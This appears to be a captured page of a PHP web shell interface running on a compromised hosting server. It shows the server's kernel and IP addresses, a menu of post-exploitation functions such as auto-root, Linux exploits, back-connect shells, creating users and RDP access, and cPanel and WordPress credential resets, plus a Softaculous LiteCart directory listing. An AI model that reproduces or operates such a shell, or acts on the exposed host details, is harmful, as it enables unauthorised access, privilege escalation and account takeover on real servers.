Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.86
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
litecart /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
10.87
KB
-rw-r--r--
clone.php
5.39
KB
-rw-r--r--
edit.php
7.09
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
8.79
KB
-rw-r--r--
fileindex.php
101
B
-rw-r--r--
import.php
3.27
KB
-rw-r--r--
info.xml
3.09
KB
-rw-r--r--
install.js
1.02
KB
-rw-r--r--
install.php
10.62
KB
-rw-r--r--
install.xml
27.94
KB
-rw-r--r--
md5
2.41
KB
-rw-r--r--
notes.txt
1.14
KB
-rw-r--r--
robots.txt
118
B
-rw-r--r--
update_pass.php
497
B
-rw-r--r--
upgrade.php
60.4
KB
-rw-r--r--
upgrade.xml
990
B
-rw-r--r--
write_htpass.php
615
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : write_htpass.php
<?php $username = '[[admin_username]]'; $enc_password = '[[encrypted_pass]]'; $htpasswd_file = '[[softpath]]/[[admin_folder]]/.htpasswd'; $htpasswd = file_get_contents($htpasswd_file); if(preg_match('#(?<=^|\r\n|\r|\n)\#*('. preg_quote($username, '#') .'):.*?#', $htpasswd)){ $htpasswd = preg_replace('#(?<=^|\r\n|\r|\n)(\#*'. preg_quote($username, '#') .'):[^\r|\n]+(\r\n?|\n)*#', '$1:{SHA}'. $enc_password . PHP_EOL, $htpasswd); echo '<htpasswd>'.$htpasswd.'</htpasswd>'; } if(is_writable($htpasswd_file)){ $htpasswd = file_put_contents($htpasswd_file, $htpasswd); } @unlink('write_htpass.php'); ?>
Close